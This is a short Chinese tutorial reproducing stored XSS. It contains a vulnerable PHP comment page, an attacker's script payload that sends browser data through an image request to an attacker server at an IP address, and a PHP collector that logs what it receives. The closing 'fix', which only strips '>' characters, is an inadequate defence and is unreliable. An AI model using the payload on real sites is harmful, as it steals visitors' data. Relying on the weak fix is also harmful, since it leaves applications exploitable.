存储型 XSS 原理复现
存储型 XSS 原理复现
漏洞最少会影响 3 个逻辑实体:
- 受害者浏览器
- 攻击者服务器
- Web 应用服务器
- Web 应用数据库(可有可无)
制作漏洞
Web 应用服务器:
<?php
// 显示多个用户的评论
// 获取用户提交的评论,并存储
$file = fopen('comment.txt','a');
fwrite($file,$_GET['comment'].'<br/>');
fclose($file);
// 在页面中显示所有评论
echo '<h1>元芳,你怎么看</h1>';
$file = fopen('comment.txt','r');
fpassthru($file);
?>
利用漏洞
攻击者提交的评论:
http://172.168.30.78:8080/?comment=
<script>var ele=document.createElement('img');ele.src="http://172.168.30.78:8080/hack.php?info=" + navigator.platform;</script>
攻击者的服务器:
<?php
$info = $_GET['info'];
$file = fopen('1.txt','a');
fwrite($file,$info);
?>
修复漏洞
应用服务器:
<?php
// 显示多个用户的评论
// 获取用户提交的评论,并存储
$file = fopen('comment.txt','a');
fwrite($file,str_replace('>','',$_GET['comment']).'<br/>');
fclose($file);
// 在页面中显示所有评论
echo '<h1>元芳,你怎么看</h1>';
$file = fopen('comment.txt','r');
fpassthru($file);
?>